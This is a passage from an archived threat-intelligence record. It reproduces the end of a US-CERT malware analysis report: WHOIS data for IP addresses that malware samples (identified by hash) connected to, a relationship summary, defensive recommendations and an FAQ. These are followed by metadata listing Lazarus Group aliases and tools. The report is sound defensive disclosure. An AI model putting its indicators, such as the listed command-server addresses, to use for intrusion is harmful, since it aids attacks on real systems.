Czech republic\r\nphone:          +420 270 000 270\r\nfax-no:         +420 270 000 277\r\ne-mail:         hostmaster@casablanca.cz\r\nabuse-mailbox:  abuse@casablanca.cz\r\nadmin-c:        
JH1771-RIPE\r\ntech-c:         JH1771-RIPE\r\nnotify:         hostmaster@casablanca.cz\r\nnic-hdl:        CASA3-RIPE\r\ncreated:        2005-09-05T10:42:10Z\r\nlast-modified: 2015-07-03T11:19:49Z\r\nsource:         RIPE\r\nmnt-by:         CASABLANCA-CORE-MNT\r\n% Information related to '81.0.213.0/24AS15685'\r\nroute:         81.0.213.0/24\r\ndescr:         Casablanca INT prefix fraction\r\norigin:         AS15685\r\nmnt-by:         CASABLANCA-CORE-MNT\r\ncreated:        2017-06-30T09:41:16Z\r\nlast-modified: 2017-06-30T09:41:16Z\r\nsource:         RIPE\r\nRelationships\r\n81.0.213.173 Connected_From 20abb95114de946da7595438e9edf0bf39c85ba8512709db7d5532d37d73bd64\r\n184.107.209.2\r\nPorts\r\n443 TCP\r\nWhois\r\nDomain Name: TVDAIJIWORLD.COM\r\nRegistry Domain ID: 632237350_DOMAIN_COM-VRSN\r\nRegistrar WHOIS Server: whois.godaddy.com\r\nRegistrar URL: http://www.godaddy.com\r\nUpdated Date: 2017-10-16T06:44:25Z\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 34 of 40\n\nCreation Date: 2006-10-14T19:18:50Z\r\nRegistrar Registration Expiration Date: 2018-10-14T19:18:50Z\r\nRegistrar: GoDaddy.com, LLC\r\nRegistrar IANA ID: 146\r\nRegistrar Abuse Contact Email: abuse@godaddy.com\r\nRegistrar Abuse Contact Phone: +1.4806242505\r\nDomain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited\r\nDomain Status: clientUpdateProhibited http://www.icann.org/epp#clientUpdateProhibited\r\nDomain Status: clientRenewProhibited http://www.icann.org/epp#clientRenewProhibited\r\nDomain Status: clientDeleteProhibited http://www.icann.org/epp#clientDeleteProhibited\r\nRegistry Registrant ID: Not Available From Registry\r\nRegistrant Name: ******** ******** (see Notes section below on how to view unmasked data)\r\nRegistrant Organization: Konkandaiz\r\nRegistrant Street: Post Box 53608\r\nRegistrant Street: Dubai\r\nRegistrant City: Dubai\r\nRegistrant State/Province: Not Applicable\r\nRegistrant Postal Code: 04\r\nRegistrant Country: 
AE\r\nRegistrant Phone: ************\r\nRegistrant Phone Ext:\r\nRegistrant Fax: 111111111111\r\nRegistrant Fax Ext:\r\nRegistrant Email: ********@*****.***\r\nRegistry Admin ID: Not Available From Registry\r\nAdmin Name: ******** ******** (see Notes section below on how to view unmasked data)\r\nAdmin Organization: Konkandaiz\r\nAdmin Street: Post Box 53608\r\nAdmin Street: Dubai\r\nAdmin City: Dubai\r\nAdmin State/Province: Not Applicable\r\nAdmin Postal Code: 04\r\nAdmin Country: AE\r\nAdmin Phone: ************\r\nAdmin Phone Ext:\r\nAdmin Fax: 111111111111\r\nAdmin Fax Ext:\r\nAdmin Email: ********@*****.***\r\nRegistry Tech ID: Not Available From Registry\r\nTech Name: ******** ******** (see Notes section below on how to view unmasked data)\r\nTech Organization: Konkandaiz\r\nTech Street: Post Box 53608\r\nTech Street: Dubai\r\nTech City: Dubai\r\nTech State/Province: Not Applicable\r\nTech Postal Code: 04\r\nTech Country: AE\r\nTech Phone: ************\r\nTech Phone Ext:\r\nTech Fax: 111111111111\r\nTech Fax Ext:\r\nTech Email: ********@*****.***\r\nName Server: MY.PRIVATEDNS.COM\r\nName Server: YOUR.PRIVATEDNS.COM\r\nDNSSEC: unsigned\r\nRelationships\r\n184.107.209.2 Connected_From 3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210\r\n111.207.78.204\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 35 of 40\n\nPorts\r\n443 TCP\r\nWhois\r\ninetnum:        111.192.0.0 - 111.207.255.255\r\nnetname:        UNICOM-BJ\r\ndescr:         China Unicom Beijing province network\r\ndescr:         China Unicom\r\ncountry:        CN\r\nadmin-c:        CH1302-AP\r\ntech-c:         SY21-AP\r\nremarks:        service provider\r\nmnt-by:         APNIC-HM\r\nmnt-lower:     MAINT-CNCGROUP\r\nmnt-lower:     MAINT-CNCGROUP-BJ\r\nmnt-routes:     MAINT-CNCGROUP-RR\r\nstatus:         ALLOCATED PORTABLE\r\nmnt-irt:        IRT-CU-CN\r\nlast-modified: 2016-05-04T00:18:25Z\r\nirt:            IRT-CU-CN\r\naddress:        No.21,Financial Street\r\naddress:   
     Beijing,100033\r\naddress:        P.R.China\r\ne-mail:         hqs-ipabuse@chinaunicom.cn\r\nabuse-mailbox: hqs-ipabuse@chinaunicom.cn\r\nadmin-c:        CH1302-AP\r\ntech-c:         CH1302-AP\r\nauth:         # Filtered\r\nmnt-by:         MAINT-CNCGROUP\r\nlast-modified: 2017-10-23T05:59:13Z\r\nperson:         ChinaUnicom Hostmaster\r\nnic-hdl:        CH1302-AP\r\ne-mail:         hqs-ipabuse@chinaunicom.cn\r\naddress:        No.21,Jin-Rong Street\r\naddress:        Beijing,100033\r\naddress:        P.R.China\r\nphone:         +86-10-66259764\r\nfax-no:         +86-10-66259764\r\ncountry:        CN\r\nmnt-by:         MAINT-CNCGROUP\r\nlast-modified: 2017-08-17T06:13:16Z\r\nperson:         sun ying\r\naddress:        fu xing men nei da jie 97, Xicheng District\r\naddress:        Beijing 100800\r\ncountry:        CN\r\nphone:         +86-10-66030657\r\nfax-no:         +86-10-66078815\r\ne-mail:         hostmast@publicf.bta.net.cn\r\nnic-hdl:        SY21-AP\r\nmnt-by:         MAINT-CNCGROUP-BJ\r\nlast-modified: 2009-06-30T08:42:48Z\r\nsource:         APNIC\r\nRelationships\r\n111.207.78.204 Connected_From 3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210\r\n80.91.118.45\r\nPorts\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 36 of 40\n\n443 TCP\r\nWhois\r\ninetnum:        80.91.118.0 - 80.91.119.255\r\nnetname:        Abissnet\r\ndescr:         Business Customers\r\ncountry:        AL\r\nadmin-c:        AB34506-RIPE\r\ntech-c:         AB34506-RIPE\r\nstatus:         ASSIGNED PA\r\nmnt-by:         AS35047-MNT\r\ncreated:        2014-10-24T10:09:33Z\r\nlast-modified: 2016-06-09T09:47:15Z\r\nsource:         RIPE\r\nrole:         Abissnet BBone\r\naddress:        Rr. Ismail Qemali, P. 
Abissnet\r\ne-mail:         bbone@abissnet.al\r\nabuse-mailbox: bbone@abissnet.al\r\nnic-hdl:        AB34506-RIPE\r\nmnt-by:         AS35047-MNT\r\ncreated:        2016-06-09T08:09:15Z\r\nlast-modified: 2016-06-09T08:41:05Z\r\nsource:         RIPE\r\n% Information related to '80.91.118.0/24AS35047'\r\nroute:         80.91.118.0/24\r\ndescr:         Abissnet ISP\r\norigin:         AS35047\r\nmnt-by:         AS35047-MNT\r\ncreated:        2011-02-27T10:24:58Z\r\nlast-modified: 2011-02-27T10:24:58Z\r\nsource:         RIPE\r\nRelationships\r\n80.91.118.45 Connected_From 3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210\r\n181.119.19.56\r\nPorts\r\n443 TCP\r\nWhois\r\nNetRange:     181.0.0.0 - 181.255.255.255\r\nCIDR:         181.0.0.0/8\r\nNetName:        LACNIC-181\r\nNetHandle:     NET-181-0-0-0-0\r\nParent:         ()\r\nNetType:        Allocated to LACNIC\r\nOriginAS:    \r\nOrganization: Latin American and Caribbean IP address Regional Registry (LACNIC)\r\nRegDate:        1993-04-30\r\nUpdated:        2010-07-21\r\nComment:        This IP address range is under LACNIC responsibility\r\nComment:        for further allocations to users in LACNIC region.\r\nComment:        Please see http://www.lacnic.net/ for further details,\r\nComment:        or check the WHOIS server located at http://whois.lacnic.net\r\nRef:            https://whois.arin.net/rest/net/NET-181-0-0-0-0\r\nOrgName:        Latin American and Caribbean IP address Regional Registry\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 37 of 40\n\nOrgId:         LACNIC\r\nAddress:        Rambla Republica de Mexico 6125\r\nCity:         Montevideo\r\nStateProv:    \r\nPostalCode:     11400\r\nCountry:        UY\r\nRegDate:        2002-07-26\r\nUpdated:        2018-03-15\r\nRef:            https://whois.arin.net/rest/org/LACNIC\r\nRelationships\r\n181.119.19.56 Connected_From 3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210\r\n59.90.93.97\r\nPorts\r\n443 
TCP\r\nWhois\r\ninetnum:        59.90.64.0 - 59.90.127.255\r\nnetname:        BB-Multiplay\r\ndescr:         O/o DGM BB, NOC BSNL Bangalore\r\ncountry:        IN\r\nadmin-c:        BH155-AP\r\ntech-c:         DB374-AP\r\nstatus:         ASSIGNED NON-PORTABLE\r\nmnt-by:         MAINT-IN-DOT\r\nmnt-irt:        IRT-BSNL-IN\r\nlast-modified: 2011-02-18T09:27:20Z\r\nsource:         APNIC\r\nirt:            IRT-BSNL-IN\r\naddress:        Internet Cell\r\naddress:        Bharat Sanchar Nigam Limited\r\naddress:        8th Floor,148-B Statesman House\r\naddress:        Barakhamba Road, New Delhi - 110 001\r\ne-mail:         abuse@bsnl.in\r\nabuse-mailbox: abuse@bsnl.in\r\nadmin-c:        NC83-AP\r\ntech-c:         CGMD1-AP\r\nauth:         # Filtered\r\nmnt-by:         MAINT-IN-DOT\r\nlast-modified: 2017-10-20T05:42:50Z\r\nsource:         APNIC\r\nperson:         BSNL Hostmaster\r\nnic-hdl:        BH155-AP\r\ne-mail:         hostmaster@bsnl.in\r\naddress:        Broadband Networks\r\naddress:        Bharat Sanchar Nigam Limited\r\naddress:        2nd Floor, Telephone Exchange, Sector 62\r\naddress:        Noida\r\nphone:         +91-120-2404243\r\nfax-no:         +91-120-2404241\r\ncountry:        IN\r\nmnt-by:         MAINT-IN-PER-DOT\r\nlast-modified: 2015-11-12T06:00:14Z\r\nperson:         DGM Broadband\r\naddress:        BSNL NOC Bangalore\r\ncountry:        IN\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 38 of 40\n\nphone:         +91-080-25805800\r\nfax-no:         +91-080-25800022\r\ne-mail:         dnwplg@bsnl.in\r\nnic-hdl:        DB374-AP\r\nmnt-by:         MAINT-IN-PER-DOT\r\nlast-modified: 2011-02-19T10:03:44Z\r\nsource:         APNIC\r\n% Information related to '59.90.80.0/20AS9829'\r\nroute:         59.90.80.0/20\r\ndescr:         BSNL Internet\r\ncountry:        IN\r\norigin:         AS9829\r\nmnt-lower:     MAINT-IN-DOT\r\nmnt-routes:     MAINT-IN-DOT\r\nmnt-by:         MAINT-IN-AS9829\r\nlast-modified: 2008-09-04T07:54:47Z\r\nsource:  
       APNIC\r\nRelationships\r\n59.90.93.97 Connected_From a71017302e1745c8a3d6e425187eb23c7531551bb6f547e47198563a78e933b6\r\nRelationship Summary\r\n8c3e0204f5... Contains a71017302e1745c8a3d6e425187eb23c7531551bb6f547e47198563a78e933b6\r\na71017302e... Connected_To 59.90.93.97\r\na71017302e... Contained_Within 8c3e0204f52200325ed36db9b12aba1c5e46984d415514538a5bf10783cacdf8\r\n675a35e04b... Contains e69d6c2d3e9c4beebee7f3a4a3892e5fdc601beda7c3ec735f0dfba2b29418a7\r\ne69d6c2d3e... Contained_Within 675a35e04b19aab314bcbc4b1f2610e3dea4a80c277cc5188f1d1391a00dfdb1\r\nd1d490866d... Contains 40ef57ca2a617f5d24ac624339ba2027b6cf301c28684bf8b2075fc7a2e95116\r\n40ef57ca2a... Contained_Within d1d490866d4a4d29306f0d9300bffc1450c41bb8fd62371d29672bf9f747bf92\r\n546dbd370a... Contains 3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210\r\n3c809a1010... Contained_Within 546dbd370a40c8e46f9b599a414f25000eec5ae6b3e046a035fe6e6cd5d874e1\r\n3c809a1010... Connected_To 184.107.209.2\r\n3c809a1010... Connected_To 111.207.78.204\r\n3c809a1010... Connected_To 80.91.118.45\r\n3c809a1010... Connected_To 181.119.19.56\r\nc9e3b83d77... Contains e088c3a0b0f466df5329d9a66ff618de3d468d8a5981715303babb1452631eef\r\ne088c3a0b0... Contained_Within c9e3b83d77ce93cc1d70b22e967f049b13515c88572aa78e0a838103e5478777\r\n20abb95114... Connected_To 98.101.211.162\r\n20abb95114... 
Connected_To 81.0.213.173\r\n98.101.211.162 Connected_From 20abb95114de946da7595438e9edf0bf39c85ba8512709db7d5532d37d73bd64\r\n81.0.213.173 Connected_From 20abb95114de946da7595438e9edf0bf39c85ba8512709db7d5532d37d73bd64\r\n184.107.209.2 Connected_From 3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210\r\n111.207.78.204 Connected_From 3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210\r\n80.91.118.45 Connected_From 3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210\r\n181.119.19.56 Connected_From 3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210\r\n59.90.93.97 Connected_From a71017302e1745c8a3d6e425187eb23c7531551bb6f547e47198563a78e933b6\r\nRecommendations\r\nCISA would like to remind users and administrators to consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.\r\nMaintain up-to-date antivirus signatures and engines.\r\nKeep operating system patches up-to-date.\r\nDisable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.\r\nRestrict users' ability (permissions) to install and run unwanted software applications. 
Do not add users to the local\r\nadministrators group unless required.\r\nEnforce a strong password policy and implement regular password changes.\r\nExercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be\r\nknown.\r\nEnable a personal firewall on agency workstations, configured to deny unsolicited connection requests.\r\nDisable unnecessary services on agency workstations and servers.\r\nScan for and remove suspicious e-mail attachments; ensure the scanned attachment is its \"true file type\" (i.e., the\r\nextension matches the file header).\r\nMonitor users' web browsing habits; restrict access to sites with unfavorable content.\r\nExercise caution when using removable media (e.g., USB thumbdrives, external drives, CDs, etc.).\r\nScan all software downloaded from the Internet prior to executing.\r\nMaintain situational awareness of the latest threats and implement appropriate ACLs.\r\nAdditional information on malware incident prevention and handling can be found in NIST's Special Publication 800-83,\r\nGuide to Malware Incident Prevention \u0026 Handling for Desktops and Laptops.\r\nContact Information\r\nDocument FAQ\r\nWhat is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in\r\na timely manner. In most instances this report will provide initial indicators for computer and network defense. To request\r\nadditional analysis, please contact US-CERT and provide information regarding the level of desired analysis.\r\nWhat is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware\r\nanalysis acquired via manual reverse engineering. To request additional analysis, please contact US-CERT and provide\r\ninformation regarding the level of desired analysis.\r\nCan I edit this document? This document is not to be edited in any way by recipients. 
All comments or questions related to this document should be directed to CISA at 1-844-Say-CISA or contact@mail.cisa.dhs.gov.\r\nCan I submit malware to CISA? Malware samples can be submitted via three methods:\r\nWeb: https://malware.us-cert.gov\r\nE-Mail: submit@malware.us-cert.gov\r\nFTP: ftp.malware.us-cert.gov (anonymous)\r\nCISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on US-CERT's homepage at www.us-cert.gov.\r\nSource: https://www.us-cert.gov/ncas/analysis-reports/AR18-165A",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"ETDA"
	],
	"references": [
		"https://www.us-cert.gov/ncas/analysis-reports/AR18-165A"
	],
	"report_names": [
		"AR18-165A"
	],
	"threat_actors": [
		{
			"id": "34eea331-d052-4096-ae03-a22f1d090bd4",
			"created_at": "2025-08-07T02:03:25.073494Z",
			"updated_at": "2026-04-10T02:00:03.709243Z",
			"deleted_at": null,
			"main_name": "NICKEL ACADEMY",
			"aliases": [
				"ATK3 ",
				"Black Artemis ",
				"COVELLITE ",
				"CTG-2460 ",
				"Citrine Sleet ",
				"Diamond Sleet ",
				"Guardians of Peace",
				"HIDDEN COBRA ",
				"High Anonymous",
				"Labyrinth Chollima ",
				"Lazarus Group ",
				"NNPT Group",
				"New Romanic Cyber Army Team",
				"Temp.Hermit ",
				"UNC577 ",
				"Who Am I?",
				"Whois Team",
				"ZINC "
			],
			"source_name": "Secureworks:NICKEL ACADEMY",
			"tools": [
				"Destover",
				"KorHigh",
				"Volgmer"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "32a223a8-3c79-4146-87c5-8557d38662ae",
			"created_at": "2022-10-25T15:50:23.703698Z",
			"updated_at": "2026-04-10T02:00:05.261989Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Lazarus Group",
				"Labyrinth Chollima",
				"HIDDEN COBRA",
				"Guardians of Peace",
				"NICKEL ACADEMY",
				"Diamond Sleet"
			],
			"source_name": "MITRE:Lazarus Group",
			"tools": [
				"RawDisk",
				"Proxysvc",
				"BADCALL",
				"FALLCHILL",
				"WannaCry",
				"MagicRAT",
				"HOPLIGHT",
				"TYPEFRAME",
				"Dtrack",
				"HotCroissant",
				"HARDRAIN",
				"Dacls",
				"KEYMARBLE",
				"TAINTEDSCRIBE",
				"AuditCred",
				"netsh",
				"ECCENTRICBANDWAGON",
				"AppleJeus",
				"BLINDINGCAN",
				"ThreatNeedle",
				"Volgmer",
				"Cryptoistic",
				"RATANKBA",
				"Bankshot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f32df445-9fb4-4234-99e0-3561f6498e4e",
			"created_at": "2022-10-25T16:07:23.756373Z",
			"updated_at": "2026-04-10T02:00:04.739611Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"APT-C-26",
				"ATK 3",
				"Appleworm",
				"Citrine Sleet",
				"DEV-0139",
				"Diamond Sleet",
				"G0032",
				"Gleaming Pisces",
				"Gods Apostles",
				"Gods Disciples",
				"Group 77",
				"Guardians of Peace",
				"Hastati Group",
				"Hidden Cobra",
				"ITG03",
				"Jade Sleet",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NewRomanic Cyber Army Team",
				"Operation 99",
				"Operation AppleJeus",
				"Operation AppleJeus sequel",
				"Operation Blockbuster: Breach of Sony Pictures Entertainment",
				"Operation CryptoCore",
				"Operation Dream Job",
				"Operation Dream Magic",
				"Operation Flame",
				"Operation GhostSecret",
				"Operation In(ter)caption",
				"Operation LolZarus",
				"Operation Marstech Mayhem",
				"Operation No Pineapple!",
				"Operation North Star",
				"Operation Phantom Circuit",
				"Operation Sharpshooter",
				"Operation SyncHole",
				"Operation Ten Days of Rain / DarkSeoul",
				"Operation Troy",
				"SectorA01",
				"Slow Pisces",
				"TA404",
				"TraderTraitor",
				"UNC2970",
				"UNC4034",
				"UNC4736",
				"UNC4899",
				"UNC577",
				"Whois Hacking Team"
			],
			"source_name": "ETDA:Lazarus Group",
			"tools": [
				"3CX Backdoor",
				"3Rat Client",
				"3proxy",
				"AIRDRY",
				"ARTFULPIE",
				"ATMDtrack",
				"AlphaNC",
				"Alreay",
				"Andaratm",
				"AngryRebel",
				"AppleJeus",
				"Aryan",
				"AuditCred",
				"BADCALL",
				"BISTROMATH",
				"BLINDINGCAN",
				"BTC Changer",
				"BUFFETLINE",
				"BanSwift",
				"Bankshot",
				"Bitrep",
				"Bitsran",
				"BlindToad",
				"Bookcode",
				"BootWreck",
				"BottomLoader",
				"Brambul",
				"BravoNC",
				"Breut",
				"COLDCAT",
				"COPPERHEDGE",
				"CROWDEDFLOUNDER",
				"Castov",
				"CheeseTray",
				"CleanToad",
				"ClientTraficForwarder",
				"CollectionRAT",
				"Concealment Troy",
				"Contopee",
				"CookieTime",
				"Cyruslish",
				"DAVESHELL",
				"DBLL Dropper",
				"DLRAT",
				"DRATzarus",
				"DRATzarus RAT",
				"Dacls",
				"Dacls RAT",
				"DarkComet",
				"DarkKomet",
				"DeltaCharlie",
				"DeltaNC",
				"Dembr",
				"Destover",
				"DoublePulsar",
				"Dozer",
				"Dtrack",
				"Duuzer",
				"DyePack",
				"ECCENTRICBANDWAGON",
				"ELECTRICFISH",
				"Escad",
				"EternalBlue",
				"FALLCHILL",
				"FYNLOS",
				"FallChill RAT",
				"Farfli",
				"Fimlis",
				"FoggyBrass",
				"FudModule",
				"Fynloski",
				"Gh0st RAT",
				"Ghost RAT",
				"Gopuram",
				"HARDRAIN",
				"HIDDEN COBRA RAT/Worm",
				"HLOADER",
				"HOOKSHOT",
				"HOPLIGHT",
				"HOTCROISSANT",
				"HOTWAX",
				"HTTP Troy",
				"Hawup",
				"Hawup RAT",
				"Hermes",
				"HotCroissant",
				"HotelAlfa",
				"Hotwax",
				"HtDnDownLoader",
				"Http Dr0pper",
				"ICONICSTEALER",
				"Joanap",
				"Jokra",
				"KANDYKORN",
				"KEYMARBLE",
				"Kaos",
				"KillDisk",
				"KillMBR",
				"Koredos",
				"Krademok",
				"LIGHTSHIFT",
				"LIGHTSHOW",
				"LOLBAS",
				"LOLBins",
				"Lazarus",
				"LightlessCan",
				"Living off the Land",
				"MATA",
				"MBRkiller",
				"MagicRAT",
				"Manuscrypt",
				"Mimail",
				"Mimikatz",
				"Moudour",
				"Mydoom",
				"Mydoor",
				"Mytob",
				"NACHOCHEESE",
				"NachoCheese",
				"NestEgg",
				"NickelLoader",
				"NineRAT",
				"Novarg",
				"NukeSped",
				"OpBlockBuster",
				"PCRat",
				"PEBBLEDASH",
				"PLANKWALK",
				"POOLRAT",
				"PSLogger",
				"PhanDoor",
				"Plink",
				"PondRAT",
				"PowerBrace",
				"PowerRatankba",
				"PowerShell RAT",
				"PowerSpritz",
				"PowerTask",
				"Preft",
				"ProcDump",
				"Proxysvc",
				"PuTTY Link",
				"QUICKRIDE",
				"QUICKRIDE.POWER",
				"Quickcafe",
				"QuiteRAT",
				"R-C1",
				"ROptimizer",
				"Ratabanka",
				"RatabankaPOS",
				"Ratankba",
				"RatankbaPOS",
				"RawDisk",
				"RedShawl",
				"Rifdoor",
				"Rising Sun",
				"Romeo-CoreOne",
				"RomeoAlfa",
				"RomeoBravo",
				"RomeoCharlie",
				"RomeoCore",
				"RomeoDelta",
				"RomeoEcho",
				"RomeoFoxtrot",
				"RomeoGolf",
				"RomeoHotel",
				"RomeoMike",
				"RomeoNovember",
				"RomeoWhiskey",
				"Romeos",
				"RustBucket",
				"SHADYCAT",
				"SHARPKNOT",
				"SIGFLIP",
				"SIMPLESEA",
				"SLICKSHOES",
				"SORRYBRUTE",
				"SUDDENICON",
				"SUGARLOADER",
				"SheepRAT",
				"SierraAlfa",
				"SierraBravo",
				"SierraCharlie",
				"SierraJuliett-MikeOne",
				"SierraJuliett-MikeTwo",
				"SimpleTea",
				"SimplexTea",
				"SmallTiger",
				"Stunnel",
				"TAINTEDSCRIBE",
				"TAXHAUL",
				"TFlower",
				"TOUCHKEY",
				"TOUCHMOVE",
				"TOUCHSHIFT",
				"TOUCHSHOT",
				"TWOPENCE",
				"TYPEFRAME",
				"Tdrop",
				"Tdrop2",
				"ThreatNeedle",
				"Tiger RAT",
				"TigerRAT",
				"Trojan Manuscript",
				"Troy",
				"TroyRAT",
				"VEILEDSIGNAL",
				"VHD",
				"VHD Ransomware",
				"VIVACIOUSGIFT",
				"VSingle",
				"ValeforBeta",
				"Volgmer",
				"Vyveva",
				"W1_RAT",
				"Wana Decrypt0r",
				"WanaCry",
				"WanaCrypt",
				"WanaCrypt0r",
				"WannaCry",
				"WannaCrypt",
				"WannaCryptor",
				"WbBot",
				"Wcry",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
				"WinorDLL64",
				"Winsec",
				"WolfRAT",
				"Wormhole",
				"YamaBot",
				"Yort",
				"ZetaNile",
				"concealment_troy",
				"http_troy",
				"httpdr0pper",
				"httpdropper",
				"klovbot",
				"sRDI"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434669,
	"ts_updated_at": 1775792299,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/434235d6dfc72720cff0494511abdc0d5b214426.pdf",
		"text": "https://archive.orkl.eu/434235d6dfc72720cff0494511abdc0d5b214426.txt",
		"img": "https://archive.orkl.eu/434235d6dfc72720cff0494511abdc0d5b214426.jpg"
	}
}